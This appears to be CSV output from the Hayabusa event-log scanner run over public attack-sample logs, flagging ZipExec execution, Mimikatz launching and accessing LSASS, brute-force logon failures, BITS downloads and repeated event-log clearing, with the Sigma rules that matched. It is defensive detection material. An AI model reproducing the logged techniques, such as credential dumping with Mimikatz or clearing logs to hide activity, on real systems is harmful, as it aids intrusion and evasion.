2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx
2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx
2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx
2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
